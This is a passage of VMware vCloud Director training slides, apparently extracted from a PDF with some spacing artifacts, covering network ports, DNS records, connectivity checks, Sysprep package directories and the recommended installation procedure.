(Optional) You can open port 22 (SSH) and port 80 (HTTP) to publicnetworks if necessary, but these open ports are not recommended.




V Mw ar e


1

1

vCloud Director Network PortsSlide 11-17

On internal networks, only a few other ports should be open on vCloud Director servers. Port 443 is

not listed here because it was mentioned earlier. Port 443 should also be open on internal networksto allow local administrators to connect to the vCloud Director administration console.

See VMware knowledge base article 1030816 at http://kb.vmware.com/kb/1030816.






Describe the prerequisites for vCloud Director installation




V Mw ar e

v C l o u d Di r e c t or I n s t

al l a t i on

1

1

Lesson 2: Installation ProcedureSlide 11-19

Lesson 2:

Installation Procedure






V Mw ar e

v C l o u d Di r e c t or I n s t

al l a t i on

1

1

Recommended Installation ProcedureSlide 11-21

1. Prepare the resource group.

2. Configure the database.

3. Configure DNS.

4. Confirm networking configuration.

5. Confirm vCloud Director server software configuration.

6. Create and install security certificates.7. Configure vShield Manager.

8. Install vCloud Director.

9. Create the Sysprep deployment package.

10.Configure vCloud Director cells.




Preparing the Resource GroupSlide 11-22

Install and configure one or more vSphere DRS/vSphere HA clusters.

The best practice is to dedicate vSphere DRS/vSphere HA clusters inthe resource group for use by vCloud Director.

Colocate the physical equipment of all resource group vSphereDRS/vSphere HA clusters into the same geographical site.

Colocating prevents cloud performance problems caused by network time lags.

Each provider virtual datacenter must have one vSphere DRS/vSphereHA cluster.

Resource pools should not be present in the vSphere DRS/vSphere HA cluster.

Use best practices when configuring networks: Separate management, VMware vSphere® vMotion®, storage, and production traffic.

Configure network redundancy for VMware vSphere® High Availability.

Make management networks accessible by the vCloud Directorservers.

Group storage into storage tiers of comparable speed and cost.




V Mw ar e


1

1

Configuring DNSSlide 11-23

The DNS configuration is critical for vCloud Director. All server names specified during vCloud

Director installation must be resolvable by DNS, including names assigned to the HTTP servicenetwork interface and the console service network interface. Both the short name and the fully

qualified domain name (FQDN) must be resolvable. Reverse lookup of the addresses assigned must

also be configured into the DNS server. Use the nslookup command to confirm that DNS name

resolution is working for both host names and reverse IP addresses.

As mentioned in the prerequisites lesson, the DNS server must be configured with both A and PTR

records for the vCloud Director network interfaces before the installation of vCloud Director.

The DNS server that vCloud Director uses should have recordspreconfigured. These records include the following:

Host records (A) preconfigured for both the vCloud Director HTTP andthe vCloud Director console proxy network connections

Reverse address lookup records preconfigured for both the vCloudDirector HTTP and the vCloud Director console proxy network

connections

VMware recommends that other frequently used addresses be

preconfigured:

vCenter Server host name and address

ESX/ESXi host name and address

Names and addresses for other servers such as database server,LDAP server, vCloud Networking and Security server, and so on




Confirming Networking ConfigurationSlide 11-24

After you have configured your DNS server and have created the two required network interfaces on

the vCloud Director server, you should confirm that your networking configuration is correct. Usethe nslookup command to make sure you can resolve all of the names and IP addresses from a

console or terminal window on the vCloud Director server. Also use ping or other tools to confirm

that the vCloud Director server has network connectivity to the following:

• Database server

• vCenter Server systems

• vShield Manager servers

• NTP servers

• Any other systems that will be used, such as LDAP

Before installation, you should confirm that the vCloud Directornetwork configuration is correct.

Two addresses on the management network:

One for HTTPS

One for console proxy

DNS name resolution of both vCloud Director addresses and any otheraddress name resolution that is required during installation

Network connectivity to the vCenter Server systems and the ESX/ESXihosts in the resource clusters

Network connectivity to the database server

Network connectivity to the vShield Manager server

Network connectivity to NTP servers

Network connectivity to other servers, such as LDAP and Syslog




V Mw ar e


1

1

Creating the Microsoft Sysprep Deployment PackageSlide 11-25

vCloud Director uses Microsoft sysprep packages to customize VMware vSphere® Apps™ during

vApp deployment. You should load Microsoft sysprep software on your vCloud Director server before creating the packages. You must use the directory names specified above for each sysprep

package. You do not have to have all of the sysprep packages if you do not plan to deploy all of

these Windows operating systems in vApps.

The sysprep software must be loaded into the proper directory on the vCloud Director server before

it can be used. If you have a multicell environment, you must have this software on each cell.

vCloud Director uses Microsoft Sysprep packages to customizeVMware vSphere® vApps during vApp deployment.

You must download these packages from Microsoft to your vCloudDirector server.

Packages must be stored in /opt/vmware/vcloud-director/guestcustomization/default/windows/sysprep .

Create subdirectories as listed and load the Sysprep contents.

Ensure that all Sysprep files are readable by the vcloud.vclouduser.

Guest OS Directory Name

Windows 2003 (32-bit) ../sysprep/svr2003

Windows 2003 (64-bit) ../sysprep/svr2003-64

Windows XP (32-bit) ../sysprep/xp

Windows XP (64-bit) ../sysprep/xp-64




Installing Other ComponentsSlide 11-26

See VMware vCloud Director Installation and Upgrade Guide beforeand during installation of vCloud Director and all collateral components.

Determine which additional components should be installed and how toinstall each.

An example is vCloud Director Networking and Security.

Identify additional preinstallation steps

Create and configure the vCloud Director database

Examples are creating and installing security certificates

Formulate an installation strategy appropriate for your cloudenvironment.




V Mw ar ev C l o u d Di r e c t or I n s t al l a t i on

1

1

Lab 17: Installing VMware vCloud Director Slide 11-27

Install vCloud Director





You should be able to meet the following objective: Use the proper procedure to install vCloud Director




V Mw ar ev C l o u d Di r e c t or I n s t al l a t i on

1

1


To complete the installation of vCloud Director, you must do thefollowing:

Meet required prerequisites.

Understand the relationship of the interconnected systems.

Use the proper installation procedure.

Questions?






Documents

VCloud Director-Install-Configure Manage Allchapters